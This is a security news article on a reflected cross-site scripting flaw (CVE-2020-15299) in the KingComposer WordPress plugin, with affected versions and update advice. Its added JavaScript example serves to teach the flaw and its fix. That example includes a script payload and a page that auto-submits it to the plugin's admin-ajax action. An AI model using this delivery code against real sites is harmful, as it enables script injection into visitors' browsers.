
XSS Flaw Impacting 100,000 WordPress Sites – Update Now!!

Recently, the Wordfence Threat Intelligence team discovered a reflected cross-site scripting (XSS) vulnerability, tracked as CVE-2020-15299, in the KingComposer WordPress plugin.

According to the report, the flaw affects roughly 100,000 websites: KingComposer is a popular drag-and-drop page builder plugin for WordPress with a large feature set and an intuitive UI.

The vulnerability was discovered on June 25 and lies in the Ajax functions the plugin uses to implement its page-builder features. One of these functions was no longer used by the plugin itself, but it could still be triggered by sending a POST request to the WordPress script admin-ajax.php with the action parameter set to kc_install_online_preset.

Reflected Cross-Site Scripting (XSS)

  • Affected Plugin: Page Builder: KingComposer – Free Drag and Drop page builder by King-Theme
  • Description: Reflected Cross-Site Scripting (XSS)
  • Plugin Slug: kingcomposer
  • Affected Versions: < 2.9.5
  • CVE ID: CVE-2020-15299
  • CVSS Score: 6.1 (medium)

Reflected XSS has characteristics of both XSS and CSRF. Like a CSRF attack, exploiting a reflected XSS vulnerability usually depends on the attacker tricking the victim into following a malicious link, or otherwise causing the victim's browser to send a request carrying a malicious payload to the vulnerable site.

This can be done in several ways, but a common approach is to first lure the victim to a site the attacker controls; that page then sends a request containing the malicious payload to the vulnerable site on the victim's behalf.

In a stored XSS attack, the payload is saved in the site's database and executed in the browser of every visitor who views the affected page. In a reflected XSS attack, the vulnerable site immediately outputs, or reflects, the malicious JavaScript payload in its response, so it is executed once in the victim's browser rather than being stored for later execution.
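To make the flow above concrete, here is an added example, written for this edit and not code from KingComposer or Wordfence, that models an admin-ajax.php-style dispatcher in JavaScript. Only the action name kc_install_online_preset comes from the advisory; the preset parameter, the handler bodies, the attacker page and the target URL are assumptions made for the demo. It shows the vulnerable handler reflecting the parameter, the hardened one escaping it, a stored variant for contrast, the CSRF-style delivery page, and the check a tester would run on the response.

```javascript
// Added example: toy model of a WordPress admin-ajax.php dispatcher with one
// reflecting handler. NOT the KingComposer code. Only the action name
// kc_install_online_preset is from the advisory; "preset", the handler bodies,
// the attacker page and the target URL are assumptions for this illustration.

// HTML-escape untrusted text before placing it in an HTML response body.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Vulnerable handler: the request parameter goes straight into the output.
function vulnerableInstallPreset(params) {
  return `<div class="kc-preset">${params.preset}</div>`;
}

// Hardened handler: identical output shape, but the parameter is escaped.
function fixedInstallPreset(params) {
  return `<div class="kc-preset">${escapeHtml(params.preset)}</div>`;
}

// Stored-XSS variant for contrast: the payload is persisted on the server and
// rendered later for every visitor, not only for the browser that sent it.
const presetStore = [];
function storePreset(params) {
  presetStore.push(params.preset);
  return presetStore.length;
}
function renderStoredPresets() {
  return '<ul>' + presetStore.map((p) => `<li>${p}</li>`).join('') + '</ul>';
}

// Stand-in for admin-ajax.php: route a POST on its "action" parameter.
function adminAjax(handlers, method, params) {
  if (method !== 'POST') return { status: 405, body: '' };
  const handler = handlers[params.action];
  // WordPress replies "0" to unknown actions; mirrored here.
  if (!handler) return { status: 400, body: '0' };
  return { status: 200, body: handler(params) };
}

// Attacker-controlled page (the CSRF-style delivery): a form that auto-submits
// the payload to the victim site from the victim's own browser. The payload is
// attribute-escaped here; the browser decodes it on submit, so the server
// still receives the raw payload.
function attackerPage(targetUrl, params) {
  const inputs = Object.entries(params)
    .map(([k, v]) => `<input type="hidden" name="${escapeHtml(k)}" value="${escapeHtml(v)}">`)
    .join('');
  return `<form id="f" method="POST" action="${escapeHtml(targetUrl)}">${inputs}</form>` +
         '<script>document.getElementById("f").submit()</script>';
}

// Tester's check: does the raw marker come back verbatim in the response body?
// An escaped copy (&lt;script&gt;...) is not a finding.
function reflectsUnescaped(body, marker) {
  return body.includes(marker);
}

// Constructed payload with a unique marker, so reflection is provable without
// relying on an alert box.
const PAYLOAD = '<script>alert("xss-marker-7f3a")</script>';
const REQUEST = { action: 'kc_install_online_preset', preset: PAYLOAD };

const vulnerableHandlers = { kc_install_online_preset: vulnerableInstallPreset };
const fixedHandlers = { kc_install_online_preset: fixedInstallPreset };

function demo() {
  const before = adminAjax(vulnerableHandlers, 'POST', REQUEST);
  const after = adminAjax(fixedHandlers, 'POST', REQUEST);
  storePreset(REQUEST);
  return {
    vulnerableReflects: reflectsUnescaped(before.body, PAYLOAD),            // true
    fixedReflects: reflectsUnescaped(after.body, PAYLOAD),                  // false
    storedExecutesLater: reflectsUnescaped(renderStoredPresets(), PAYLOAD), // true
    getRejected: adminAjax(vulnerableHandlers, 'GET', REQUEST).status,      // 405
  };
}

console.log(demo());
console.log(attackerPage('https://victim.example/wp-admin/admin-ajax.php', REQUEST));
```

The tester's check is deliberately crude: a verbatim echo of the marker is the finding, while whether it actually executes depends on where in the HTML it lands. The stored variant shows the difference the text draws: the reflected response affects only the browser that sent the request, whereas the stored copy is served to everyone who later views the list.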

Measures to Avoid This Security Flaw

  • Update the KingComposer plugin to version 2.9.5 or later, which fixes this vulnerability; every version below 2.9.5 is affected.
  • Administrators who manage several WordPress installations should check each site for an outdated copy of the plugin rather than assuming one patched site means all are patched.
  • Sites running Wordfence Premium have been protected since June 15, 2020, but that protection is a stopgap, not a substitute for updating the plugin.
  • Antivirus on end-user devices or a scan of the office network does not remediate this flaw: it is a server-side bug in the website's plugin, so the fix has to be applied on the site itself.

According to the Wordfence Threat Intelligence team's report, this XSS vulnerability is fully patched in version 2.9.5, so they strongly recommend that users update to the latest version as soon as possible.

Sites running Wordfence Premium have been protected against this vulnerability, as well as the earlier vulnerabilities in the KingComposer plugin, since June 15, 2020.


Balaji N

BALAJI is an Ex-Security Researcher (Threat Research Labs) at Comodo Cybersecurity. Editor-in-Chief & Co-Founder - Cyber Security News & GBHackers On Security.
